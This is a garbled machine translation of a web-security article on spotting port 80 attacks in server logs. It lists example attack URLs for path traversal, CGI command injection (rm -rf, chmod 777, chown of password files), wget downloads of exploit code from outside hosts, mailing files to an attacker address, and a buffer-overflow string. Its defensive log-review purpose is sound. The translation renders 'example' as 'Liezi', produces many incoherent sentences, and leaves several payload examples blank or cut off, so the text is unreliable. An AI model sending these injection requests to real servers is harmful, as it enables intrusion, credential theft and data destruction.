I. Summary
II. A detailed description of
III. Further
IV. Spillover Analysis
V. Transcoding
VI. Conclusion
[Abstract]
The default web site port 80 to serve on its various security problems continue to release them, even some of these vulnerabilities allow an attacker to obtain system administrator privileges to enter the site itself, the following are some of Zenomorph 80 ports on the traces of the threat patterns research, and tell you how to find the problem from the log record.
[Detail]
Here in part through a number of Liezi display on web servers and applications on their general attack, and its traces, which represent only Liezi major attack, there is no list of all form of attack, this section will detailed description of the role of each attack, and its how to exploit these vulnerabilities to attack.
(1) "." ".." And "..." request
Traces of these attacks are very common for web applications and web server, which used to allow an attacker or worm-virus program to change the web server's path, to gain access to closed areas. Most CGI programs with these flaws, ".." request.
Example:
http://host/cgi-bin/lame.cgi?file=../../../../etc/motd
This shows the attacker Liezi request mosd this file, if the attacker the ability breakthrough web server root directory, then get more information and to obtain further privileges.
(2) "% 20" request
% 20 is the hex value that the 16 spaces, although this does not mean you can use anything, but when you view the log will find it, some web server application running on this character may be effectively implemented Therefore, you should carefully review the log. On the other hand, the request can sometimes help to perform some commands.
Example:
http://host/cgi-bin/lame.cgi?page=ls% 20-al |
This Liezi shows attacker to execute a unix command, listing the entire catalog of documents requested, causing the attacker to access important files on your system and help provide the conditions he has to obtain a privilege.
(3) "% 00" request
% 00 said the 16-byte hexadecimal empty, he was able to fool the web application, and request different types of files.
Examples:
http://host/cgi-bin/lame.cgi?page=index.html
This may be a valid request in the machine, if an attacker aware of this request was successful, he will further look for the cgi procedures.
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd
Perhaps the cgi program does not accept this request because it is the request to check the file name suffix, such as: html.shtml or other types of files. Most programs will tell you the requested file type is invalid, this time it will tell the attacker requests the file must be a character of a file type suffix, so an attacker can get the system path, file name, resulting in your system more sensitive information
http://host/cgi-bin/lame.cgi?page=../../../../etc/motd% 00html
Attention to this request, it will cheat cgi program that this document is to determine the acceptable file types, some applications of effective inspections as stupid request file, which is commonly used methods of the attacker.
(4) "|" request
This is a pipe character, in the unix system, a request for help in the implementation of several system commands at the same time.
Example:
# Cat access_log | grep-i ".."
(This command will display the log in the ".." request, commonly used in the attacks and worms found)
Often find that many web applications use this character, this also leads to false alarms in the IDS logs.
In the careful examination of your application, so the advantage of reducing false alarms in intrusion detection systems.
Here are some of Lieh-tzu:
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls |
This request command, the following are some changes in Liezi
http://host/cgi-bin/lame.cgi?page=../../../../bin/ls% 20-al% 20/etc |
This request is listed in the unix system / etc directory of all files
http://host/cgi-bin/lame.cgi?page=cat% 20access_log | grep% 20-i% 20 "lame"
The cat command execution request and the implementation of grep command will also, check out the "lame"
(5) ";" request
In unix systems, this character allows multiple command line execution
Example:
# Id; uname-a
(Implementation of the id command, followed by implementation of the uname command)
Some web program with this character, may result in your IDS logs a warning of failure, you should carefully check your web program, so you reduce the risk of failure of IDS alerts.
(6) "<" and ">" Request
Should check your logs record the two characters, a number of reasons, the first one is the character that the added data in the document
Example 1:
# Echo "your hax0red h0 h0">> / etc / motd (motd request written information in this document)
An attacker can easily use the request as above tampering with your web page. Such as the famous RDS exploit the attacker is often used to change the web page.
Example 2:
http://host/something.php=Hi% 20mom% 20Im% 20Bold!
Html you will notice that the language of signs here, he also spent "<",">" characters, such attacks can not cause the attacker to access the system, it confused people think this is a legitimate web site information (leading to People visit this link to visit the attacker to set the address, this request may be encoded into 16 hex characters in the form, so that traces of the attack is not so obvious)
(7) "!" Request
Common language on this character request SS (Server Side Include) I attack, if the attacker is an attacker confuse the user clicks the link set, and the same as above.
Example:
http://host1/something.php =
The Lieh-tzu is an attack may be doing it to make a site file host2 from host1 appears above (of course, require visitors to visit the attacker's connection settings. This request may be converted into 16 hex encoding mask, not easily found)
At the same time, this approach can also execute the command authority web site
Example:
http://host/something.php =
The Lieh-run on the remote system "id" command, it will display the web site user's id, is usually "nobody" or "www"
This form also allows the included hidden files.
Example:
http://host/something.php =
The hidden files. Htpasswd will not be displayed, Apache will refuse to establish such rules to. Ht the request form, and SSI logo will bypass such restrictions, and lead to security problems
(8) "," Request
Such attacks used to attempt to remotely insert a PHP web application procedures, it may allow the execution order, depending on server settings, and other factors at work (such as php is set to safe mode)
Example: http://host/something.php = passthru ("id ");?>
In some simple php application, it may be to web site on the remote system user rights to perform the local command
(9) "` "request
This character later used to execute commands in perl, the characters in the web application is not often used, so if you see it in your log, should be very careful
Example:
http://host/something.cgi = `id`
Write a perl cgi program in question would lead to implementation of the id command
[Further]
The following section will discuss the implementation of more attacks could command, together with the documents requested, and if you have a remote command execution flaw, how examination revealed it. This part is just to give you a good idea, and tell your system what is happening, attackers try to attack your system traces, but does not list all of the attacker to use the commands and requests.
"/ Bin / ls"
This command requests the entire path, in many web applications have this loophole, if you log in many places such a request, it is possible for a great distance Zhixing command vulnerability, but not necessarily a problem may also be a false alarm. Once again reminded, web application written (cgi, asp, php ... etc) is the basis of security
Example:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/ls% 20-al |
http://host/cgi-bin/bad.cgi?doh=ls% 20-al;
"Cmd.exe"
This is a windows of the shell, if an attacker to access and run this script in the server settings under the conditions allowed in the windows machine can do anything, a lot of worms is through port 80, communication to the remote machine
http://host/scripts/something.asp=../../WINNT/system32/cmd.exe?dir+e:
"/ Bin / id"
This is a two binary files, it is the problem and / bin / ls, like, if you log a lot of places to see such a request, it is possible for large remote execution Command Vulnerability, but not necessarily a problem may also be a false alarm.
It will show which part belongs to which user and group
Example:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/id |
http://host/cgi-bin/bad.cgi?doh=id;
"/ Bin / rm"
This command can delete files without the correct use is very dangerous
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../bin/rm% 20-rf% 20 * |
http://host/cgi-bin/bad.cgi?doh=rm% 20-rf% 20 *;
"Wget and tftp" command
These commands are often the attacker may gain further privileges to download files, wget is a unix command under, may be used to download backdoors, tftp is under the command unix and nt, is used to download the file. Some IIS worms spread themselves by tftp to copy the virus to other hosts
Examples:
http://host/cgi-bin/bad.cgi?doh=../../../../path/to-wget/wget% 20http: / / host2/Phantasmp.c | http:// host / cgi-bin / bad.cgi? doh = wget% 20http: / / www.hwa-security.net/Phantasmp.c;
"Cat" command
This command is used to view the contents of the file, used to read the important information, such as configuration files, password files, credit files and documents you can think of
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cat% 20/etc/motd | http://host/cgi-bin/ bad.cgi? doh = cat% 20/etc/motd;
"Echo" command
This command used to write data to the file, such as "index.html"
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/echo% 20 "fc-# kiwis% 20was% 20here"% 20>> % 200day.txt | http://host/cgi-bin/bad.cgi?doh=echo% 20 "fc-# kiwis% 20was% 20here"% 20>>% 200day.txt;
"Ps" command
Lists the currently running process, tell the attacker that a remote host running the software in order to get some idea of security issues, to obtain further permissions
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/ps% 20-aux | http://host/cgi-bin/bad. cgi? doh = ps% 20-aux;
"Kill and killall" command
Unix systems in order to kill this process, an attacker can use this command to stop the system services and processes can also erase the traces of the attacker, some exploit will produce a lot of child processes
Examples: http://host/cgi-bin/bad.cgi?doh=../bin/kill% 20-9% 200 | http://host/cgi-bin/bad.cgi?doh=kill% 20 -9% 200;
"Uname" command
This command tells the attacker the remote machine's name, for some time, through this web site in order to know which isp, perhaps the attacker has this access before. Uname-a to request normally, these will be recorded in the log file
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/uname% 20-a | http://host/cgi-bin/bad. cgi? doh = uname% 20-a;
"Cc, gcc, perl, python, etc ..." compilation / interpretation of the command
Attacker through wget or tftp download exploit, and use the cc, gcc compiler to compile this into an executable program, and further access privileges
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/cc% 20Phantasmp.c | http://host/cgi-bin/bad. cgi? doh = gcc% 20Phantasmp.c;. / a.out% 20-p% 2031337;
If you view the logs found in "perl" python "These instructions may be a remote attacker to download perl, python script, and tried to get the privileges of local
"Mail" command
Attackers often use this command system, some important documents to the attacker's own mailbox, but also willing to e-mail bomb attacks are carried out
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/mail% 20attacker@fuckcnhonker.org% 20 <
2.168.22.1;
"Chown, chmod, chgrp, chsh, etc ..." and other commands
These commands allow the system to change unix file permissions
chown = allows setting the file owner chmod = allows to set file permissions chgrp = allows the owner to change the group permissions on files chsh = allowed to change the user's shell
Examples: http://host/cgi-bin/bad.cgi?doh=../../../../bin/chmod% 20777% 20index.html | http://host/cgi-bin/ bad.cgi? doh = chmod% 20777% 20index.html; http://host/cgi-bin/bad.cgi?doh=../../../../bin/chown% 20zeno% 20 / etc / master.passwd | http://host/cgi-bin/bad.cgi?doh=chsh% 20/bin/sh; http://host/cgi-bin/bad.cgi?doh=../. . / .. / .. / bin / chgrp% 20nobody% 20/etc/shadow |
"/ Etc / passwd" file
This is the system's password file, usually shadow off, and does not allow to see the encrypted password, but for an attacker who can know what is valid user, and the system's absolute path, site name and other information, as is usually by shadow off, so the attacker will normally see / etc / shadow file
"/ Etc / master.passwd"
This file is the BSD system password file, contains the encrypted password, the file on the root account is only read-only, and some unskilled attackers opened his attempt to read the contents inside., If the web site is root privileges to run, then the attacker is, we can read the contents inside, a lot of problems for system administrators will come one after another
"/ Etc / shadow"
Contains a password encrypted system, read the same on the root account, and / et / master.passwd almost
"/ Etc / motd"
When users log into the unix system, there's information in the "Message of the Day" file, it provides important system information and administrator of the users of some set, users who want to see, and those not, also contains the system version information, the attacker usually see this file, to understand what the system is running on the attacker, the next step is to search for this type of system, exploit, and further access to system privileges
"/ Etc / hosts"
The document provides ip address and network information, an attacker can learn more about the system's network settings
"/ Usr / local / apache / conf / httpd.conf"
This is a Apache web server configuration file, an attacker can understand, such as cgi, ssi and other information is accessible
"/ Etc / inetd.conf"
This is the inetd service configuration file, an attacker can learn the remote machine start those services, whether to use the wrapper to access control, if the wrapper was found running, an attacker the next step will check "/ etc / hosts.allow" and "/ etc / hosts.deny", file, and which may change some settings, access privileges
". Htpasswd,. Htaccess, and. Htgroup"
These files are typically used in web site user authentication, an attacker would view these files, and obtain a user name and password, the password file. Htpasswd is encrypted, break through some simple decryption process, allow an attacker to access the site protected areas (usually the user with the same user name and password, the attacker can even visit other account)
"Access_log and error_log"
These are the apache server log files, attackers often view these files, look at those requests are recorded, those and other requests for different places
Typically, the attacker will modify these log files, such as the address of his own information, the attacker through the port 80 through your system and your system also not making backup's job, no other recording system Zhuangkuang recording procedures, which will intrusion detection becomes very difficult to work
"[Drive-letter]: winntrepairsam._ or [drive-letter]: winntrepairsam"
Windows NT system password file, if the remote command can not be implemented, attackers will usually request these documents, then "l0pht crack" of the type of password cracking tools to crack, if the attacker tries to attack administrator's password file, if successful then the remote machine will be the attacker gets control
[Overflow analysis]
In this article I will not say too much about the overflow of the topic, I will give out what those phenomena and traces of noteworthy and of particular concern, the buffer attacks are sometimes attacker transcoding and other ways to achieve the difficult to find
Here is a simple Lie Zi
Example: http://host/cgi-bin/helloworld?type=AAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAA AA
This Liezi shows the attacker on an application to send a lot of A character, to test the program a buffer overflow, buffer overflow can get a remote command execution host permissions, if the owner has the setuid and procedures for the root, through the overflow, can get access to the entire system, if not like setuid program, then the overflow is only by running the web site's user rights
Here can not tell all the circumstances, but you should regularly check your log file, if that day suddenly found a lot of requests, but usually not more than the request, it means you are subjected to overflow attacks, of course, may also be A new network worm attack
[Transcoding]
All the attacks mentioned above request, the attacker usually knows IDS systems often mechanical check request, usually the attacker will use data conversion tool to convert the requested content format 16 band, resulting in IDS will ignore these requests, We are familiar with the CGI vulnerability scanning tool that is a good Liezi Whisker. If you view the log of the time found a large number of 16-band and not some common characters, then the attacker may try to use some of the ways to attack your system
Fast discovery of the method is in your log files the request of those 16 hex, copy it to your browser, the browser can be converted into the correct request, and displayed the requested content, if you do not courage to take this risk, a simple man ASCII, can provide you with the correct code.
[Conclusion]
This article can not cover all the 80 ports of the attack, but above the list of most common attacks, and tell you how to check your log files, and Zen Yang Jiaruyixie IDS rules, write Ta It is meant to web system administrator should be concerned about what a good idea at the same time, I hope this article helps to web program web developers to write better programs
OF NOTE: If you have any comments and suggestions, please send an e-mail admin@cgisecurity.com.